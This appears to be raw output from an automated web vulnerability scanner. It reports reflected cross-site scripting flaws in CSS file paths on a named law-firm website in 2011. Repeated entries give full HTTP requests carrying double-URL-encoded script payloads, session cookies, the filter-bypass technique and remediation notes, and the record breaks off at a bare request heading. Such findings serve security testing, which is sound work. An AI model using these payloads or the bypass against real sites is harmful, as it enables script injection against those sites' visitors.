GET /css/ui801be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35c17289cf6/ui.accordion.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2a82%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb61ee3f3a8a was submitted in the REST URL parameter 3. This input was echoed as a2a82"><script>alert(1)</script>b61ee3f3a8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.accordion.cssa2a82%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb61ee3f3a8a HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 874a6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebba185a7c96 was submitted in the REST URL parameter 1. This input was echoed as 874a6"><script>alert(1)</script>bba185a7c96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css874a6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebba185a7c96/ui/ui.all.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e27d4aec5989 was submitted in the REST URL parameter 2. This input was echoed as 3782d"><script>alert(1)</script>27d4aec5989 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui3782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e27d4aec5989/ui.all.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb48dfbd1665 was submitted in the REST URL parameter 3. This input was echoed as c332a"><script>alert(1)</script>b48dfbd1665 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.all.cssc332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb48dfbd1665 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aa04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f73509fbde was submitted in the REST URL parameter 1. This input was echoed as 9aa04"><script>alert(1)</script>3f73509fbde in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css9aa04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f73509fbde/ui/ui.base.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a32e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7ea1967ea4 was submitted in the REST URL parameter 2. This input was echoed as a32e5"><script>alert(1)</script>b7ea1967ea4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/uia32e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7ea1967ea4/ui.base.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4008%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e674bcd1bc31 was submitted in the REST URL parameter 3. This input was echoed as a4008"><script>alert(1)</script>674bcd1bc31 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.base.cssa4008%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e674bcd1bc31 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfd19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32dc5bc06f was submitted in the REST URL parameter 1. This input was echoed as cfd19"><script>alert(1)</script>32dc5bc06f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /csscfd19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32dc5bc06f/ui/ui.core.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cac63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d010f954eb was submitted in the REST URL parameter 2. This input was echoed as cac63"><script>alert(1)</script>5d010f954eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/uicac63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d010f954eb/ui.core.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6878%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49980770f59 was submitted in the REST URL parameter 3. This input was echoed as c6878"><script>alert(1)</script>49980770f59 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.core.cssc6878%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49980770f59 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbf73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef798e920d23 was submitted in the REST URL parameter 1. This input was echoed as fbf73"><script>alert(1)</script>f798e920d23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cssfbf73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef798e920d23/ui/ui.datepicker.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6749%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54913b0be8b was submitted in the REST URL parameter 2. This input was echoed as b6749"><script>alert(1)</script>54913b0be8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/uib6749%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54913b0be8b/ui.datepicker.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45672%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f4fe8f9220 was submitted in the REST URL parameter 3. This input was echoed as 45672"><script>alert(1)</script>4f4fe8f9220 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.datepicker.css45672%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f4fe8f9220 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbd401dfa0f was submitted in the REST URL parameter 1. This input was echoed as 36a08"><script>alert(1)</script>cbd401dfa0f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css36a08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbd401dfa0f/ui/ui.dialog.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee88d9eeae49 was submitted in the REST URL parameter 2. This input was echoed as 8c042"><script>alert(1)</script>e88d9eeae49 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui8c042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee88d9eeae49/ui.dialog.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf81b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed17f52d89 was submitted in the REST URL parameter 3. This input was echoed as bf81b"><script>alert(1)</script>ed17f52d89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.dialog.cssbf81b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed17f52d89 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cb17%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee53ecb908c0 was submitted in the REST URL parameter 1. This input was echoed as 5cb17"><script>alert(1)</script>e53ecb908c0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css5cb17%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee53ecb908c0/ui/ui.progressbar.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 612ba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b00486b426 was submitted in the REST URL parameter 2. This input was echoed as 612ba"><script>alert(1)</script>8b00486b426 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
